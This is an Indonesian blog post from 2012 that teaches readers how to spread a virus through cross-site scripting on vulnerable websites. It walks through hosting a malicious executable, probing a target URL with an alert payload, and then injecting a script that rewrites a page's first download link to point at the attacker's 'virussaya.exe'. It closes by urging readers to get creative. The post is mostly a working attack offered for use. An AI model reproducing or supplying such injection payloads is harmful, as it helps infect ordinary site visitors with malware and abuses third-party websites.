' Hacker not Cracker: XSS Untuk Penyebaran Virus .

Senin, 24 Desember 2012

XSS Untuk Penyebaran Virus


Sahabat semuanya, apa kabar?
Saatnya beraksi agar kalian bisa mengetahui, pake tools apa sih para virus creator untuk menyebarkan virusnya?
Semua pasti bertanya-tanya, para virus creator menggunakan apa sih untuk menyebarkan virus? Berikut ini adalah beberapa cara bagaimana virus creator menyebarkan virusnya:
1. Email
2. Phising
3. USB
4. Hacking
5. Cracking
Kita memilih dengan cara Hacking & Cracking yaitu dengan menggunakan XSS!
Skenarionya adalah:
1. Kita memiliki situs virus / menempatkan sebuah virus di situs, misal:http://www.situssaya.com/virussaya.exe
2. Kita memiliki target yang memiliki vulnerability untuk CSS, misalkan: http://www.target.com/index.php?download=<script>alert(“BinusHacker Was Here”)</script> apabila muncul alert box, berarti website tersebut memiliki vulnerability.
Bagi yang menggunakan Mozilla Firefox, silakan download tools berikut untuk melakukan check XSS:
Download XSS Tools
Nah, langsung saja pada praktek!
Ubah saja yang ada di web target menjadi seperti berikut untuk menyebarkan virus:
http://www.target.com/index.php?download=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.situssaya.com/virussaya.exe”; }</script>
Kesimpulan:
Setiap ada user yang melakukan download di website tersebut, yang akan terdownload adalah virus yang kita miliki.
Gunakan imajinasi anda, agar bisa lebih berkreasi kembali.
Berikut adalah contoh, penjelesan dan video mengenai XSS Persistence Demo
Semoga artikel di atas bermanfaat & selamat berkreasi di tahun baru :)

Tidak ada komentar: